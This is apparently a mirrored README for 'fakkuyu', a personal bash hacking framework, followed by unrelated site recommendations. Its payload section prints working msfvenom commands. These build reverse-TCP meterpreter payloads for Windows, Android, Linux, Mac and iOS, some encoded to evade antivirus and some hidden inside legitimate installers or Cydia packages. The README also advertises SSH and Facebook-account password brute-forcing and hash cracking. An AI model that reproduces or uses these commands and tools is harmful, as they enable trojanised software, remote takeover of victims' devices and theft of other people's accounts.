Giter Site home page Giter Site logo

fakkuyu's Introduction

ファックユー

My priv8 framework, written in bash

Language

Dependencies

  • Metasploit - For creating and execute payload
  • Nmap - For performing port scanning
  • Curl - For sending request to api

Optional dependencies

  • Arcane - For embedding iOS payload
  • PHP-Curl - For sending http request
  • Shreder - For bruteforcing SSH passwords

Menu Explanation

  • Payload Generator

    This menu provides automatic payload generator, and will automatically take you to meterpreter

    Available Payloads :

    • Windows Payload

      • Simple Executable File Payload
      msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 LHOST=$ip LPORT=$port -f exe > $out
      • Payload Embedded to Installer
      msfvenom -a x86 --platform windows -x $ins -k -p windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port -e x86/shikata_ga_nai -i 9 -f exe -o $out
    • Android Payload

      • Simple Aplication Package Payload
      msfvenom -p android/meterpreter/reverse_tcp LHOST=$ip LPORT=$port R > $out
    • Linux Payload

      • Simple Reverse TCP Payload
      msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$ip LPORT=$port -f elf > $out
    • Mac Payload

      • Simple Reverse TCP Payload
      msfvenom -p osx/x86/shell_reverse_tcp LHOST=$ip LPORT=$port -f macho > $out
      • Executable Python Payload
      msfvenom -p python/meterpreter/reverse_tcp LHOST=$ip LPORT=$port > $out
    • iOS Payload

      • Reverse TCP Payload (execute via SSH)
      msfvenom -p apple_ios/aarch64/meterpreter_reverse_tcp LHOST=$ip LPORT=$port -f macho -o $out
      chmod +x $out
      ldid -S $out
      • Embedded iOS Package (packaged by Arcane)
      ./arcane.sh --input $deb --lhost $ip --lport $port --cydia --netcat
  • Brute Force Attack

    This menu provides tools for performing Brute Force attack

    • SSH Password Brute - Bruteforcing password for username@host desired by user
    • Facebook Account Brute - Can be used for bruteforcing multiple account with multiple password
  • DNS Queries

    This menu provides tools for using DNS queries

    • DNS Lookup - View the standard DNS records for a domain
    • Reverse DNS Lookup - Discover the reverse DNS entries for an IP address, a range of IP addresses or a domain name
    • DNS Host Records - Find all Forward DNS records for a domain
    • Shared DNS Servers - Find hosts sharing DNS servers
    • DNS Digging - Get all DNS records for a target domain
  • IP Tools

    This menu provides tools for lookup IP information

    • GeoIP Location Lookup - Find the location of an IP address
    • Reverse IP Lookup - Find all A records associated with an IP address
    • Subnet Lookup - Determine the properties of a network subnet
    • Autonomous System Lookup - Check an Autonomous System Number for IP prefixes
    • Banner Grabbing - Discover network services by simply querying the service port
  • Web Tools

    This menu provides tools for Web Pentesting

    • HTTP Header Check - Review the HTTP Headers from a web server
    • Extract Links From Page - Parse the html of a website and extract links from the page
    • Reverse Google Analytics Lookup - Perform a reverse Google Analytics search to find all web properties associated with a Google Analytics ID
    • Subdomain Finder - Automatically search all subdomains from host
    • Subdomain Brute (using wordlists) - Perform Bruteforce attack to search all subdomains from hosts
    • Directory Brute - Perform Bruteforce attack to search all directory from hosts
    • Admin Login Finder - Perform Bruteforce attack to search panel for admin login
  • Hash Killer

    This menu provides tools for Hash Cracking

  • Nmap Helper

External Links

Note

Some of tools in this script require root access

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.